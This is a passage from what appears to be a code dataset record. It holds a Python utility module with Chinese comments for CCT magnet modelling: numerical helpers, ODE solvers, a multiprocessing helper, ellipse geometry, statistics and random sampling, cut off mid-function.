"usage_type": "call"}, {"api_name": "forms.ScriptUploadForm", "line_number": 162, "usage_type": "call"}, {"api_name": "forms.FootageUploadForm", "line_number": 163, "usage_type": "call"}, {"api_name": "forms.FinalVideoUploadForm", "line_number": 164, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 176, "usage_type": "call"}, {"api_name": "models.Sketch.objects.get", "line_number": 179, "usage_type": "call"}, {"api_name": "models.Sketch.objects", "line_number": 179, "usage_type": "attribute"}, {"api_name": "models.Sketch", "line_number": 179, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.filter", "line_number": 180, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 180, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 180, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 184, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects.get", "line_number": 188, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 188, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 188, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 190, "usage_type": "call"}]} +{"seq_id": "72963662913", "text": "\"\"\"\nCCT 建模优化代码\n基本工具\n\n作者:赵润晓\n日期:2021年4月24日\n\"\"\"\n\nimport multiprocessing # since v0.1.1 多线程计算\nimport time # since v0.1.1 统计计算时长\nfrom typing import Any, Callable, Dict, Generic, Iterable, List, NoReturn, Optional, Tuple, TypeVar, Union\nimport matplotlib.pyplot as plt\nimport math\nimport random # since v0.1.1 随机数\nimport sys\nimport os # since v0.1.1 查看CPU核心数\nimport numpy\nfrom scipy.integrate import solve_ivp # since v0.1.1 ODE45\nimport warnings # since v0.1.1 提醒方法过时\nfrom packages.constants import *\nfrom packages.point import P2, P3\n\n\nclass BaseUtils:\n \"\"\"\n 这里存放一些简单的工具,如\n 1. 判断两个对象是否相等\n 2. numpy 中用于生成均匀分布的 linspace 方法\n 3. 角度转弧度 angle_to_radian 和 弧度转角度 radian_to_angle\n 4. 打印函数调用栈 print_traceback (这个主要用于 debug)\n 5. 椭圆。用于生成椭圆圆周上均匀分布的若干点\n \"\"\"\n\n @staticmethod\n def equal(\n a: Union[float, int, P2, P3],\n b: Union[float, int, P2, P3],\n err: float = 1e-6,\n msg: Optional[str] = None,\n ) -> bool:\n \"\"\"\n 判断 a b 是否相等,相等返回 true\n 当 a b 不相等时,若 msg 为空,返回 flase,否则抛出异常,异常信息即 msg\n\n 因此这个函数不仅可以用来判断相等,还可以作为 assert\n \"\"\"\n if (isinstance(a, float) or isinstance(a, int)) and (\n isinstance(b, float) or isinstance(b, int)\n ):\n if (\n a == b\n or abs(a - b) <= err\n or ((a + b != 0.0) and ((2 * abs((a - b) / (a + b))) <= err))\n ):\n return True\n else:\n if msg is None:\n return False\n else:\n raise AssertionError(msg)\n elif (isinstance(a, P2) and isinstance(b, P2)) or (\n isinstance(a, P3) and isinstance(b, P3)\n ):\n if a.__eq__(b, err=err, msg=msg):\n return True\n else:\n if msg is None:\n return False\n else:\n raise AssertionError(msg)\n else:\n if a == b:\n return True\n else:\n if msg is None:\n return False\n else:\n raise AssertionError(msg)\n\n @staticmethod\n def linspace(\n start: Union[float, int, P2, P3], end: Union[float, int, P2, P3], number: int\n ) -> List[Union[float, P2, P3]]:\n \"\"\"\n 同 numpy 的 linspace\n \"\"\"\n # 除法改成乘法以适应 P2 P3 对象\n d = (end - start) * (1 / (number - 1))\n # i 转为浮点以适应 P2 P3 对象\n return [start + d * float(i) for i in range(number)]\n\n @staticmethod\n def angle_to_radian(\n deg: Union[float, int, List[Union[float, int]]]\n ) -> Union[float, List[float]]:\n \"\"\"\n 角度值转弧度制\n 对于单个角度,或者角度数组都可以使用\n \"\"\"\n if isinstance(deg, float) or isinstance(deg, int):\n return deg / 180.0 * math.pi\n elif isinstance(deg, List):\n return [BaseUtils.angle_to_radian(d) for d in deg]\n else:\n raise NotImplementedError\n\n @staticmethod\n def radian_to_angle(\n rad: Union[float, int, List[Union[float, int]]]\n ) -> Union[float, List[float]]:\n \"\"\"\n 弧度制转角度制\n 对于单个弧度,或者弧度数组都可以使用\n \"\"\"\n if isinstance(rad, float) or isinstance(rad, int):\n return rad * 180.0 / math.pi\n elif isinstance(rad, List):\n return [BaseUtils.radian_to_angle(d) for d in rad]\n elif isinstance(rad, numpy.ndarray):\n return numpy.array([BaseUtils.radian_to_angle(d) for d in rad])\n else:\n raise NotImplementedError\n\n @staticmethod\n def circle_center_and_radius(p1: P2, p2: P2, p3: P2) -> Tuple[P2, float]:\n \"\"\"\n 已知三个二维点 p1 p2 p3\n 求由这三个点组成的圆的圆心和半径\n 方法来自:https://blog.csdn.net/liutaojia/article/details/83625151\n \"\"\"\n x1 = p1.x\n x2 = p2.x\n x3 = p3.x\n y1 = p1.y\n y2 = p2.y\n y3 = p3.y\n z1 = x2 ** 2 + y2 ** 2 - x1 ** 2 - y1 ** 2\n z2 = x3 ** 2 + y3 ** 2 - x1 ** 2 - y1 ** 2\n z3 = x3 ** 2 + y3 ** 2 - x2 ** 2 - y2 ** 2\n A = numpy.array(\n [[(x2 - x1), (y2 - y1)], [(x3 - x1), (y3 - y1)], [(x3 - x2), (y3 - y2)]]\n )\n B = 0.5 * numpy.array([[z1], [z2], [z3]])\n c = numpy.linalg.inv(A.T @ A) @ A.T @ B\n c = P2.from_numpy_ndarry(c)\n # c = (A'*A)\\A'*B;\n R1 = math.sqrt((c.x - x1) ** 2 + (c.y - y1) ** 2)\n R2 = math.sqrt((c.x - x2) ** 2 + (c.y - y2) ** 2)\n R3 = math.sqrt((c.x - x3) ** 2 + (c.y - y3) ** 2)\n R = (R1 + R2 + R3) / 3\n return c, R\n\n @staticmethod\n def polynomial_fitting(xs: List[float], ys: List[float], order: int) -> List[float]:\n \"\"\"\n 多项式拟合\n xs 自变量数组\n ys 因变量数组\n order 拟合阶数\n\n 返回一个数组\n 数组第 0 项为拟合常数项\n 数组第 i 项为拟合 i 次项\n \"\"\"\n fit = numpy.polyfit(xs, ys, order)\n return fit[::-1].tolist()\n\n @staticmethod\n def polynomial_fitted_function(coefficient_list: List[float]) -> Callable[[float], float]:\n \"\"\"\n 将多项式拟合结果:系数数组 coefficient_list\n 转为\n \"\"\"\n def f(x: float) -> float:\n # 常数项\n y = coefficient_list[0]\n for i in range(1, len(coefficient_list)):\n coefficient = coefficient_list[i]\n y += coefficient * (x ** i)\n return y\n\n return f\n\n @staticmethod\n def list_multiply(\n li: Union[List[int], List[float], List[P2], List[P3]], number: Union[int, float]\n ) -> Union[List[int], List[float], List[P2], List[P3]]:\n \"\"\"\n 让数组中每个元素都乘以一个数\n \"\"\"\n return [e * number for e in li]\n\n @staticmethod\n def derivative(func: Callable[[float], Union[float, P2, P3]],\n delta: float = 1e-7) -> Callable[[float], Union[float, P2, P3]]:\n \"\"\"\n 函数 func 求导,微分\n delta 即 Δ,f' = (f(x+Δ)-f(x))/Δ\n \"\"\"\n def d(x: float) -> Union[float, P2, P3]:\n return (func(x+delta/2)-func(x-delta/2))/delta\n\n return d\n\n @staticmethod\n def interpolate_lagrange(x: float, x0: float, y0: float,\n x1: float, y1: float, x2: float, y2: float, x3: float, y3: float,\n error: float = 1e-8) -> float:\n \"\"\"\n 拉格朗日插值法 4 个点\n 利用四点 (x0,y0) (x1,y1) (x2,y2) (x3,y3) 多项式插值,f(x)\n 返回 x 对应的 y,即 f(x)\n\n 当 x 和 xi 的差小于 error 时,直接返回 yi,既是为了快速计算,也是为了防止后面公式中除0\n\n since v0.1.3 这个函数引入,为了计算 opera 导出的磁场表格数据,在任意一点的磁场\n \"\"\"\n if abs(x-x0) < error:\n return y0\n if abs(x-x1) < error:\n return y1\n if abs(x-x2) < error:\n return y2\n if abs(x-x3) < error:\n return y3\n\n t0 = (x - x1)*(x - x2)*(x - x3)*y0 / ((x0 - x1)*(x0 - x2)*(x0 - x3))\n t1 = (x - x0)*(x - x2)*(x - x3)*y1 / ((x1 - x0)*(x1 - x2)*(x1 - x3))\n t2 = (x - x0)*(x - x1)*(x - x3)*y2 / ((x2 - x0)*(x2 - x1)*(x2 - x3))\n t3 = (x - x0)*(x - x1)*(x - x2)*y3 / ((x3 - x0)*(x3 - x1)*(x3 - x2))\n\n tt = t0 + t1 + t2 + t3\n\n if math.isnan(tt):\n print(\n f\"error in interpolate_lagrange params={x},{x0},{y0},{x1},{y1},{x2},{y2},{x3},{y3}\")\n return 0.0\n\n return tt\n\n @staticmethod\n def is_sorted(li: List) -> bool:\n \"\"\"\n 判断数组是否有序(从大到小排列)\n 这个方法来自 https://www.zhihu.com/question/368573897\n 虽然无法快速退出,但很简洁\n \"\"\"\n return all([li[i] <= li[i + 1] for i in range(len(li) - 1)])\n\n @staticmethod\n def print_traceback() -> None:\n \"\"\"\n 打印函数调用栈\n 用于 debug\n -------\n\n \"\"\"\n f = sys._getframe()\n while f is not None:\n print(f)\n f = f.f_back\n\n @staticmethod\n def runge_kutta4(\n t0: float,\n t_end: float,\n Y0: T,\n y_derived_function: Callable[[float, T], T],\n dt: float,\n record: bool = False\n ) -> Union[T, Tuple[List[float], List[T]]]:\n \"\"\"\n 4 阶 runge kutta 法求解微分方程组\n t0 自变量起始值\n t_end 自变量终值\n Y0 方程在 t0 处的值\n y_derived_function 函数 Y' = f(x,Y)\n dt 计算步长\n record 是否返回每一步的结果\n 如若是,返回 自变量 t 数组和 Y 数组\n 否,则返回 t_end 处 Y(t) 值\n since v0.1.1\n \"\"\"\n number: int = math.ceil((t_end - t0) / dt)\n dt = (t_end - t0) / float(number)\n\n if record:\n ts = [t0]\n Ys = [Y0]\n for ignore in range(number):\n k1 = y_derived_function(t0, Y0)\n k2 = y_derived_function(t0 + dt / 2, Y0 + dt / 2 * k1)\n k3 = y_derived_function(t0 + dt / 2, Y0 + dt / 2 * k2)\n k4 = y_derived_function(t0 + dt, Y0 + dt * k3)\n\n t0 = t0 + dt\n Y0 = Y0 + (dt / 6) * (k1 + 2 * k2 + 2 * k3 + k4)\n ts.append(t0)\n Ys.append(Y0)\n return (ts, Ys)\n else:\n for ignore in range(number):\n k1 = y_derived_function(t0, Y0)\n k2 = y_derived_function(t0 + dt / 2, Y0 + dt / 2 * k1)\n k3 = y_derived_function(t0 + dt / 2, Y0 + dt / 2 * k2)\n k4 = y_derived_function(t0 + dt, Y0 + dt * k3)\n\n t0 += dt\n Y0 += (dt / 6) * (k1 + 2 * k2 + 2 * k3 + k4)\n\n return Y0\n\n @staticmethod\n def solve_ode(\n t0: float,\n t_end: float,\n Y0: List[float],\n y_derived_function: Callable[[float, List[float]], List[float]],\n dt: float,\n record: bool = False,\n absolute_tolerance: float = 1e-8,\n relative_tolerance: float = 1e-8\n ) -> numpy.ndarray: # 二维数组\n \"\"\"\n scipy 中 ode45\n 即变步长 4 阶 runge kutta 法\n since v0.1.1\n\n Y 必须是一维组形式,即 Y = [y0, y1, y2....]\n\n 返回值 ret 是一个二维数组\n ret[0][-1] 是 y0 在 t_end 的值\n ret[1][-1] 是 y1 在 t_end 的值\n ret[2][-1] 是 y2 在 t_end 的值\n 。。。。。。\n \"\"\"\n if record:\n raise NotImplementedError\n # number: int = math.ceil((t_end-t0)/dt)\n # t_eval = numpy.linspace(t0, t_end, number)\n # s = solve_ivp(y_derived_function, [\n # t0, t_end], Y0, t_eval=t_eval, rtol=1e-8, atol=1e-8, first_step=dt, max_step=dt)\n else:\n s = solve_ivp(y_derived_function, [\n t0, t_end], Y0, rtol=relative_tolerance, atol=absolute_tolerance, first_step=dt, max_step=dt)\n return s.y\n\n # 多进程安全提示 since v0.1.1\n __I_AM_SURE_MY_CODE_CLOSED_IN_IF_NAME_EQUAL_MAIN: bool = False\n\n # 子线程名字,用于判断当前进程是不是子进程\n # _CHILD_PROCESS_NAME:str = 'CCTPY_CHILD_PROCESS'\n\n @classmethod\n def i_am_sure_my_code_closed_in_if_name_equal_main(cls):\n \"\"\"\n 多线程安全提示\n since v0.1.1\n \"\"\"\n cls.__I_AM_SURE_MY_CODE_CLOSED_IN_IF_NAME_EQUAL_MAIN = True\n\n # @staticmethod\n # def _set_current_process_name(name:str)->None:\n # \"\"\"\n # 设置当前进程名字\n # \"\"\"\n # multiprocessing.current_process().name = name\n\n @classmethod\n def submit_process_task(cls,\n task: Callable[..., T],\n param_list: List[List],\n concurrency_level: Optional[int] = None,\n report: bool = True,\n i_want_to_create_process_pool_in_child_process: bool = False\n ) -> List[T]:\n \"\"\"\n 提交任务多进程并行\n task 要运行的任务,是一个函数\n T 任务返回值\n param_list 任务参数数组,数组每个元素表示一个 task 的输出组合\n concurrency_level 并发等级,默认为 CPU 核心数\n report 是否报告耗时\n\n\n 因为 python 具有全局解释器锁,所以 CPU 密集任务无法使用线程加速,只能使用进程\n see https://www.cnblogs.com/dragon-123/p/10247252.html\n\n since v0.1.1\n \"\"\"\n # 确定当前进程池是否由主进程创建\n current_pool_is_create_by_main_process = False\n cpn = multiprocessing.current_process().name.upper()\n if cpn.find(\"POOL\") == -1:\n current_pool_is_create_by_main_process = True\n else:\n if not i_want_to_create_process_pool_in_child_process:\n print(\"警告:\")\n print(\"检测到子进程执行 submit_process_task 函数\")\n print(\"这可能导致异常\")\n\n # 有两种情况会创建进程池\n # 1 执行此函数的进程为主进程\n # 2 参数 i_want_to_create_process_pool_in_child_process 为 True,即用户要求在子进程中创建进程池\n # i_want_to_create_process_pool_in_child_process 默认值为 False\n # 也就是说,默认情况下,不允许在子进程中创建进程池\n if i_want_to_create_process_pool_in_child_process or current_pool_is_create_by_main_process:\n\n if not cls.__I_AM_SURE_MY_CODE_CLOSED_IN_IF_NAME_EQUAL_MAIN:\n # 删除激进的报错方式\n # raise PermissionError(\n # \"在使用CPU并行计算前,应确保你的脚本写在if __name__ == '__main__':\"\n # + \"代码块内部,并显式调用BaseUtils.i_am_sure_my_code_closed_in_if_name_equal_main()函数\"\n # )\n print(\"警告:\")\n print(\"当前你正在进行 CPU 并行计算。如果你的脚本没有被\")\n print(\"if __name__ == '__main__':\")\n print(\"包裹起来,可能会发生意外。\")\n print(\"如果出现意外情况,请加上 if __name__ == '__main__': \")\n\n if concurrency_level is None:\n concurrency_level = os.cpu_count()\n if concurrency_level <= 0:\n raise ValueError(\n f\"concurrency_level = {concurrency_level} 值应大于0\")\n if report:\n print(f\"处理并行任务,任务数目{len(param_list)},并行等级{concurrency_level}\")\n start = time.time()\n pool = multiprocessing.Pool(\n processes=concurrency_level\n ) # 开启一次性进程池\n r = pool.starmap(task, param_list) # 执行任务\n pool.close() # 停止接受任务\n pool.join() # 等待完成\n if report:\n print(f\"任务完成,用时{time.time() - start}秒\")\n return r\n else:\n # 这个分支不应该进入\n print(\"警告:\")\n print(\"检测到子进程执行 submit_process_task 函数\")\n print(\"这可能导致异常,已自动终止这一行为\")\n print(\"如果 submit_process_task 需要在子进程中执行,请传入参数\")\n print(\"i_want_to_create_process_pool_in_child_process = True\")\n\n class Ellipse:\n \"\"\"\n 椭圆类\n Ax^2+Bxy+Cy^2=D\n \"\"\"\n\n def __init__(self, A: float, B: float, C: float, D: float):\n self.A = float(A)\n self.B = float(B)\n self.C = float(C)\n self.D = float(D)\n\n def __eq__(self, other: 'BaseUtils.Ellipse') -> bool:\n \"\"\"\n 椭圆相等判断\n 注意:因为 A B C D 具有放大不变性,所以判断为不等的椭圆,有可能是相等的\n\n since v0.1.4\n \"\"\"\n return (\n self.A == other.A and\n self.B == other.B and\n self.C == other.C and\n self.D == other.D\n )\n\n def __hash__(self) -> int:\n \"\"\"\n hash 方法,因为需要将椭圆当作字典的键\n\n since v0.1.4\n \"\"\"\n return hash((self.A, self.B, self.C, self.D))\n\n def point_at(self, theta: float) -> P2:\n \"\"\"\n 原点出发,方向th弧度的射线和椭圆Ax^2+Bxy+Cy^2=D的交点\n Parameters\n ----------\n theta 弧度\n\n Returns 方向th弧度的射线和椭圆Ax^2+Bxy+Cy^2=D的交点\n -------\n\n \"\"\"\n d = P2()\n\n while theta < 0:\n theta += 2 * math.pi\n\n while theta > 2 * math.pi:\n theta -= 2 * math.pi\n\n if BaseUtils.equal(theta, 0) or BaseUtils.equal(theta, 2 * math.pi):\n d.x = math.sqrt(self.D / self.A)\n d.y = 0\n\n if BaseUtils.equal(theta, math.pi):\n d.x = -math.sqrt(self.D / self.A)\n d.y = 0\n\n t = 0.0\n\n if 0 < theta < math.pi:\n t = 1 / math.tan(theta)\n d.y = math.sqrt(\n self.D / (self.A * t * t + self.B * t + self.C))\n d.x = t * d.y\n\n if math.pi < theta < 2 * math.pi:\n theta -= math.pi\n t = 1 / math.tan(theta)\n d.y = -math.sqrt(self.D / (self.A * t *\n t + self.B * t + self.C))\n d.x = t * d.y\n\n return d\n\n # circumference 方法缓存\n CIRCUMFERENCE_CACHE: Dict['BaseUtils.Ellipse', float] = dict()\n\n @property\n def circumference(self) -> float:\n \"\"\"\n 计算椭圆周长\n Returns 计算椭圆周长\n\n refactor v0.1.4 添加缓存\n -------\n\n \"\"\"\n c: float = BaseUtils.Ellipse.CIRCUMFERENCE_CACHE.get(self)\n\n if c is None:\n num: int = 3600 * 4\n c: float = 0.0\n for i in range(num):\n c += (\n self.point_at(2.0 * math.pi / float(num) * (i + 1))\n - self.point_at(2.0 * math.pi / float(num) * (i))\n ).length()\n\n BaseUtils.Ellipse.CIRCUMFERENCE_CACHE[self] = c\n\n return c\n\n def point_after(self, length: float) -> P2:\n \"\"\"\n 在椭圆 Ax^2+Bxy+Cy^2=D 上行走 length,返回此时的点\n 规定起点:椭圆与X轴正方向的交点\n 规定行走方向:逆时针\n Parameters\n ----------\n length 行走距离\n\n Returns 椭圆 Ax^2+Bxy+Cy^2=D 上行走 length,返回此时的点\n -------\n\n \"\"\"\n step_theta = BaseUtils.angle_to_radian(0.05)\n theta = 0.0\n while length > 0.0:\n length -= (\n self.point_at(theta + step_theta) - self.point_at(theta)\n ).length()\n\n theta += step_theta\n\n return self.point_at(theta)\n\n def uniform_distribution_points_along_edge(self, num: int) -> List[P2]:\n \"\"\"\n 返回椭圆圆周上均匀分布的 num 个点\n \"\"\"\n points = []\n c = self.circumference\n for i in range(num):\n points.append(self.point_after(c / num * i))\n\n return points\n\n @classmethod\n def create_standard_ellipse(cls, a: float, b: float) -> \"BaseUtils.Ellipse\":\n \"\"\"\n 构建标准椭圆\n x**2/a**2+y**2/b**2 = 1\n\n 则 Ax^2+Bxy+Cy^2=D 中\n A = b**2\n B = 0\n C = a**2\n D = a**2 * b**2\n\n since 0.1.4\n \"\"\"\n return BaseUtils.Ellipse(A=b**2, B=0.0, C=a**2, D=(a**2) * (b**2))\n\n class Statistic:\n \"\"\"\n 统计器\n since v0.1.1\n refactor v0.1.3 增加 add_all 和 helf_width 方法\n \"\"\"\n\n def __init__(self):\n self.__data: List[float] = []\n\n def data(self) -> List[float]:\n \"\"\"\n 获取全部数据\n \"\"\"\n return self.__data\n\n def size(self) -> int:\n \"\"\"\n 元素数目\n \"\"\"\n return len(self.__data)\n\n def add(self, val: float) -> 'BaseUtils.Statistic':\n \"\"\"\n 添加元素\n \"\"\"\n self.__data.append(val)\n return self\n\n def add_all(self, vals: Iterable[float]) -> 'BaseUtils.Statistic':\n \"\"\"\n 添加多个元素\n \"\"\"\n self.__data.extend(vals)\n return self\n\n def max(self) -> float:\n \"\"\"\n 最大值\n \"\"\"\n return numpy.max(self.__data)\n\n def absolute_max(self) -> float:\n \"\"\"\n\n \"\"\"\n return numpy.max(numpy.abs(self.__data))\n\n def min(self) -> float:\n \"\"\"\n 最小值\n \"\"\"\n return numpy.min(self.__data)\n\n def var(self) -> float:\n \"\"\"\n 方差\n \"\"\"\n return numpy.var(self.__data)\n\n def average(self) -> float:\n \"\"\"\n 均值\n \"\"\"\n return sum(self.__data) / len(self.__data)\n\n def width(self) -> float:\n \"\"\"\n 宽度\n 即 (max-min)\n 这个方法用于求束斑大小\n \"\"\"\n return (self.max()-self.min())\n\n def half_width(self) -> float:\n \"\"\"\n 半宽\n 即 (max-min)/2\n 这个方法用于求束斑大小\n \"\"\"\n return self.width()/2\n\n def undulate(self) -> float:\n \"\"\"\n 求 abs((max - min) / average)\n \"\"\"\n if self.size() == 1:\n return 0.0\n else:\n max = self.max()\n min = self.min()\n average = self.average()\n if BaseUtils.equal(max, 0, err=1e-5) and BaseUtils.equal(min, 0, err=1e-5):\n return 0.0\n if BaseUtils.equal(average, 0, err=1e-5):\n return 0.0\n\n return abs((max - min) / average)\n\n def clear(self):\n \"\"\"\n 清空\n \"\"\"\n self.__data: List[float] = []\n return self\n\n class Random:\n \"\"\"\n 产生随机分布的类\n 包括以下分布\n uniformly_distributed_along_circumference 单位圆的圆周均匀分布\n uniformly_distributed_in_circle 单位圆内均匀分布\n uniformly_distributed_at_spherical_surface 单位球面均匀分布\n uniformly_distributed_in_sphere 单位球内均匀分布\n uniformly_distributed_along_elliptic_circumference 椭圆的圆周均匀分布\n uniformly_distributed_in_ellipse 椭圆内均匀分布\n uniformly_distributed_at_ellipsoidal_surface 椭球球面均匀分布\n uniformly_distributed_in_ellipsoid 椭球球内均匀分布\n uniformly_distributed_at_hyperespherical_surface 超球体表面均匀分布\n uniformly_distributed_in_hyperesphere 超球体内均匀分布\n uniformly_distributed_at_hypereellipsoidal_surface 超椭球体表面均匀分布\n uniformly_distributed_in_hypereellipsoid 超椭球体内均匀分布\n\n gauss 高斯分布 / 正态分布 2021年2月26日 新增\n gauss_multi_dimension 多维无关高斯分布(标准椭球) 2021年2月26日 新增\n\n 辅助函数\n hypersphere_volume 超球体体积\n hypersphere_area 超球体面积\n\n\n\n since v0.1.4\n \"\"\"\n @classmethod\n def uniformly_distribution(cls,max:float=1.0,min:float=0.0) -> float:\n \"\"\"\n max ~ min 均匀分布\n 新增于 2021年6月17日\n \"\"\"\n if max < min:\n return ValueError(f\"max {max} < min {min}\")\n center = (max+min)/2.0\n width = max - min\n return random.random() * width + center - 0.5 * width\n\n @classmethod\n def uniformly_distributed_along_circumference(cls) -> P2:\n \"\"\"\n 单位圆的圆周均匀分布点\n 原理:生成 [0, 2π) 的均与分布点,就是圆的方位角 azimuth,再转为二维点\n \"\"\"\n azimuth = 2.0 * math.pi * random.random() # [0, 2π)\n return P2(math.cos(azimuth), math.sin(azimuth))\n\n @staticmethod\n def uniformly_distributed_in_circle() -> P2:\n \"\"\"\n 单位圆内均匀分布\n 原理:生成两个 [-1, 1] 分布的点 x y,\n 若 (x,y) 在圆内则返回,否则重试\n \"\"\"\n while True:\n x = random.uniform(-1, 1)\n y = random.uniform(-1, 1)\n if x**2+y**2 <= 1:\n return P2(x, y)\n\n @staticmethod\n def uniformly_distributed_at_spherical_surface() -> P3:\n \"\"\"\n 单位球面均匀分布\n 原理:天顶角 zenith / θ 的取值范围为 [0, π],\n 当具体取值为 θ0 时,对应的圆半径为 sin(θ0),则周长为 2πsin(θ0)\n 因此生成两个随机数 θ/天顶角 和周长位置 a\n θ 的取值范围为 [0, π]\n a 的取值范围为 [0, 2π]\n 若 a < 2πsin(θ0),则 (θ, a) 是圆面上的点,输出\n \"\"\"\n while True:\n zenith = random.uniform(0, math.pi) # 天顶角\n a = random.uniform(0, 2*math.pi)\n if a < 2.0*math.pi*math.sin(zenith):\n azimuth = a / math.sin(zenith) # 方位角\n return P3(\n x=math.sin(zenith)*math.cos(azimuth),\n y=math.sin(zenith)*math.sin(azimuth),\n z=math.cos(zenith)\n )\n\n @staticmethod\n def uniformly_distributed_in_sphere() -> P3:\n \"\"\"\n 单位球内均匀分布\n 原理:产生三个随机数 x y z,为 [-1,1] 上均匀分布\n 若这三个数对应的点在单位球内部,则输出\n \"\"\"\n while True:\n x = random.uniform(-1, 1)\n y = random.uniform(-1, 1)\n z = random.uniform(-1, 1)\n if x**2+y**2+z**2 <= 1:\n return P3(x, y, z)\n\n @staticmethod\n def uniformly_distributed_along_elliptic_circumference(a: float, b: float) -> P2:\n \"\"\"\n 椭圆的圆周均匀分布点\n 原理:求椭圆周长 c0,生成 [0, c) 的均与分布点 c,求得方位角度 azimuth,再转为二维点\n\n 椭圆必须是正椭圆\n a 为 x 轴方向轴长度\n b 为 y 轴方向轴长度\n \"\"\"\n e = BaseUtils.Ellipse(A=1/(a**2), C=1/(b**2), B=0.0, D=1.0)\n c0 = e.circumference # 椭圆周长\n\n c = random.uniform(0, c0)\n\n return e.point_after(c)\n\n @staticmethod\n def uniformly_distributed_in_ellipse(a: float, b: float) -> P2:\n \"\"\"\n 椭圆内均匀分布\n 原理:生成两个 [-a, a] 和 [-b, b] 分布的点 x y,\n 若 (x,y) 在椭圆内则返回,否则重试\n\n 椭圆必须是正椭圆\n a 为 x 轴方向轴长度\n b 为 y 轴方向轴长度\n \"\"\"\n while True:\n x = random.uniform(-a, a)\n y = random.uniform(-b, b)\n if (x**2)/(a**2)+(y**2)/(b**2) <= 1:\n return P2(x, y)\n\n @staticmethod\n def uniformly_distributed_at_ellipsoidal_surface(a: float, b: float, c: float) -> P3:\n \"\"\"\n 椭球球面均匀分布\n 原理:天顶角 zenith / θ 的取值范围为 [0, π],\n 当具体取值为 θ0 时,对应的椭圆周长可以计算,设为 c0,最大值为 c_max\n 因此生成两个随机数 θ/天顶角 和周长位置 a\n θ 的取值范围为 [0, π]\n a 的取值范围为 [0, c_max]\n 若 a < c0,则 (θ, a) 是椭圆面上的点,输出\n\n 椭球必须是正椭球\n a 为 x 轴方向轴长度\n b 为 y 轴方向轴长度\n c 为 z 轴方向轴长度\n \"\"\"\n # 椭球在 z=0 平面,即 xy 平面上的 椭圆\n e_xy = BaseUtils.Ellipse(A=1/(a**2), C=1/(b**2), B=0.0, D=1.0)\n\n # 椭球在 zy 平面上的椭圆,且横坐标为 z,纵坐标为 y\n e_zy = BaseUtils.Ellipse(A=1/(c**2), C=1/(b**2), B=0.0, D=1.0)\n\n # 椭球在 zx 平面上的椭圆,且横坐标为 z,纵坐标为 x\n e_zx = BaseUtils.Ellipse(A=1/(c**2), C=1/(a**2), B=0.0, D=1.0)\n\n # e_xy 椭圆的周长\n c_max = e_xy.circumference\n\n while True:\n # 天顶角 / 高度角\n zenith = random.uniform(0, math.pi) # 天顶角\n\n # 可能的周长\n a = random.uniform(0, c_max)\n\n # 由 天顶角 和椭球交点产生的小椭圆 e_cur\n a_cur = e_zx.point_at(zenith).y # ax\n b_cur = e_zy.point_at(zenith).y # by\n\n # 小椭圆 e_cur\n e_cur = BaseUtils.Ellipse(\n A=1/(a_cur**2), C=1/(b_cur**2), B=0.0, D=1.0)\n # 小椭圆周长\n c0_cur = e_cur.circumference\n\n # 如果 a 小于小椭圆周长,则 (zenith,a) 在椭球面上\n if a <= c0_cur:\n # x y 坐标\n p_xy = e_cur.point_after(a)\n # z 坐标\n pz = e_zx.point_at(zenith).x\n return P3(p_xy.x, p_xy.y, pz)\n\n @staticmethod\n def uniformly_distributed_in_ellipsoid(a: float, b: float, c: float) -> P3:\n \"\"\"\n 椭球球内均匀分布\n 原理:产生三个随机数 x y z,为 [-a,a] [-b,b] [-c,c]上均匀分布\n 若这三个数对应的点在单位球内部,则输出\n\n 椭球必须是正椭球\n a 为 x 轴方向轴长度\n b 为 y 轴方向轴长度\n c 为 z 轴方向轴长度\n\n since\n \"\"\"\n while True:\n x = random.uniform(-a, a)\n y = random.uniform(-b, b)\n z = random.uniform(-c, c)\n if (x**2)/(a**2)+(y**2)/(b**2)+(z**2)/(c**2) <= 1:\n return P3(x, y, z)\n\n @classmethod\n def hypersphere_volume(cls, d: int, r: float = 1.0) -> float:\n \"\"\"\n 超球体的体积\n https://baike.baidu.com/item/%E8%B6%85%E7%90%83%E9%9D%A2/4907511?fr=aladdin#2\n\n d 维度\n r 超球体半径\n \"\"\"\n if isinstance(d, int):\n if d % 2 == 1:\n # 维度为奇数\n k = (d-1)//2\n c = (2**d)*(math.factorial(k)) * \\\n (math.pi**k)/(math.factorial(d))\n return c*(r**d)\n else:\n # 维度为偶数\n k = d//2\n c = (math.pi**k)/(math.factorial(k))\n return c*(r**d)\n else:\n raise ValueError(f\"维度{d}必须是整数\")\n\n @classmethod\n def hypersphere_area(cls, d: int, r: float = 1.0) -> float:\n \"\"\"\n 超球体的表面积\n https://baike.baidu.com/item/%E8%B6%85%E7%90%83%E9%9D%A2/4907511?fr=aladdin#2\n\n d 维度\n r 超球体半径\n \"\"\"\n if isinstance(d, int):\n return cls.hypersphere_volume(d, r)*d/r\n else:\n raise ValueError(f\"维度{d}必须是整数\")\n\n @classmethod\n def uniformly_distributed_at_hyperespherical_surface(cls, d: int, r: float = 1.0) -> List[float]:\n \"\"\"\n 超球体面均匀分布\n 递归计算\n\n d 维度\n r 超球体半径\n\n 注意 2 维球体表面分布,指的是圆周分布\n \"\"\"\n if isinstance(d, int):\n if d == 1:\n # 一维直线\n raise ValueError(\"一维球无表面\")\n elif d == 2:\n # 二维圆\n p = cls.uniformly_distributed_along_circumference().change_length(r)\n return [p.x, p.y]\n else:\n # 高维\n while True:\n # 第一个维度分布\n fisrt_dim = random.uniform(-r, r)\n # 剩余维度,是一个 d-1 维的超球体,表面积最大为\n area_max = cls.hypersphere_area(d-1, r)\n # 表面积均匀分布\n area_pick = random.uniform(-area_max, area_max)\n\n # 实际上 fisrt_dim 确定后,d-1 维球体的半径为\n r_sub = math.sqrt(r**2-fisrt_dim**2) # bug fixed\n # 这样实际的表面积是\n area_real = cls.hypersphere_area(d-1, r_sub)\n if area_pick <= area_real:\n return [fisrt_dim] + cls.uniformly_distributed_at_hyperespherical_surface(d-1, r_sub)\n else:\n raise ValueError(f\"维度{d}必须是整数\")\n\n @classmethod\n def uniformly_distributed_at_hypereellipsoidal_surface(cls, 